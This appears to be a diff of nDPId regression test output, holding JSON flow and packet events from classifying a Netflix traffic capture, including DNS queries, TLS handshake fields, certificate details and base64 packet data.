00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032865,"flow_last_seen":1484319032865,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319032865,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -14,58 +14,58 @@ 00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032882,"flow_last_seen":1484319032882,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319032882,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.us-west-2.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1484319032884,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1484319032884,"pkt":"5JjWH70UgCqoTGHMCABFAADS4UJAAEAR1X\/AqAEBwKgBBwA1y5QAvmn70IiBgAABAAgAAAAAB2ljaG5hZWEJdXMtd2VzdC0yBnByb2RhYQduZXRmbGl4A2NvbQAAAQABwAwAAQABAAAAAQAENkXM8cAMAAEAAQAAAAEABDQqmRbADAABAAEAAAABAAQ2RDCIwAwAAQABAAAAAQAENkQSPsAMAAEAAQAAAAEABDZGuZ3ADAABAAEAAAABAAQ0IoVtwAwAAQABAAAAAQAENpVZIsAMAAEAAQAAAAEABDaUWeg="} 00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319032882,"flow_last_seen":1484319032884,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1484319032884,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ichnaea.us-west-2.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.69.204.241"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032888,"flow_last_seen":1484319032888,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032888,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1484319032888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032888,"pkt":"gCqoTGHM5JjWH70UCABFAABA+AxAAEAGfcXAqAEHNkXM8c9xAbuJGKiDAAAAALAC\/\/+XvgAAAgQFtAEDAwUBAQgKH2S4KwAAAAAEAgAA"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032896,"flow_last_seen":1484319032896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032896,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1484319032896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032896,"pkt":"gCqoTGHM5JjWH70UCABFAABADepAAEAGIy3AqAEHNr8RM896Abu7NDMxAAAAALAC\/\/+WKQAAAgQFtAEDAwUBAQgKH2S4MgAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1484319032934,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319032934,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGjLY2RczxwKgBBwG7z3E0MsEbiRiohKASReqX9AAAAgQFtAQCCAqFp0\/bH2S4KwEDAwg="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1484319032937,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319032937,"pkt":"gCqoTGHM5JjWH70UCABFAAA0mxZAAEAG2sfAqAEHNkXM8c9xAbuJGKiENDLBHIAQEBX8aAAAAQEICh9kuFmFp0\/b"} -00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032888,"flow_last_seen":1484319032938,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319032938,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"spdy\/3.1,spdy\/3,http\/1.1"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1484319032943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319032943,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGR\/s2vxEzwKgBBwG7z3pSqS+duzQzMqASOJAFFAAAAgQFtAQCCAqtijmlH2S4MgEDAwg="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1484319032944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319032944,"pkt":"gCqoTGHM5JjWH70UCABFAAA0cYhAAEAGv5rAqAEHNr8RM896Abu7NDMyUqkvnoAQEBVcLgAAAQEICh9kuGCtijml"} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032896,"flow_last_seen":1484319032959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319032959,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032984,"flow_last_seen":1484319032984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032984,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1484319032984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032984,"pkt":"gCqoTGHM5JjWH70UCABFAABAh8JAAEAG+QHAqAEHNCDEJM97AbvHy0puAAAAALAC\/\/\/BrQAAAgQFtAEDAwUBAQgKH2S4hgAAAAAEAgAA"} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032986,"flow_last_seen":1484319032986,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319032986,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1484319032986,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319032986,"pkt":"gCqoTGHM5JjWH70UCABFAABAdf5AAEAGCsbAqAEHNCDEJM98AbvweU0rAAAAALAC\/\/+WPwAAAgQFtAEDAwUBAQgKH2S4iAAAAAAEAgAA"} -00917{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032888,"flow_last_seen":1484319032990,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319032990,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"spdy\/3.1,spdy\/3,http\/1.1"}} -01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032888,"flow_last_seen":1484319032991,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319032991,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}} -01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032896,"flow_last_seen":1484319033008,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319033008,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01356{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032896,"flow_last_seen":1484319033017,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319033017,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1484319033029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033029,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGl6g0IMQkwKgBBwG7z3ve3c1cx8tKb6ASRepkbwAAAgQFtAQCCAq2m8VuH2S4hgEDAwg="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1484319033032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033032,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGlqg0IMQkwKgBBwG7z3xLWYWT8HlNLKASReoUTgAAAgQFtAQCCAq2m8VvH2S4iAEDAwg="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1484319033032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033032,"pkt":"gCqoTGHM5JjWH70UCABFAAA0rMBAAEAG1A\/AqAEHNCDEJM97AbvHy0pv3t3NXYAQEBXI5wAAAQEICh9kuLC2m8Vu"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032984,"flow_last_seen":1484319033033,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033033,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1484319033038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319033038,"pkt":"gCqoTGHM5JjWH70UCABFAAA0iIJAAEAG+E3AqAEHNCDEJM98AbvweU0sS1mFlIAQEBV4xgAAAQEICh9kuLK2m8Vv"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032986,"flow_last_seen":1484319033038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319033038,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032984,"flow_last_seen":1484319033086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1484319033086,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032984,"flow_last_seen":1484319033087,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3128,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033087,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} -00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032986,"flow_last_seen":1484319033098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1484319033098,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032986,"flow_last_seen":1484319033112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3128,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1484319033112,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319033206,"flow_last_seen":1484319033206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319033206,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1484319033206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319033206,"pkt":"gCqoTGHM5JjWH70UCABFAABAagpAAEAGFrrAqAEHNCDEJM99AbszkZRgAAAAALAC\/\/8LKQAAAgQFtAEDAwUBAQgKH2S5UQAAAAAEAgAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1484319033258,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319033258,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGlqg0IMQkwKgBBwG7z33SmoRGM5GUYaASReoDCgAAAgQFtAQCCAq2m8WoH2S5UQEDAwg="} 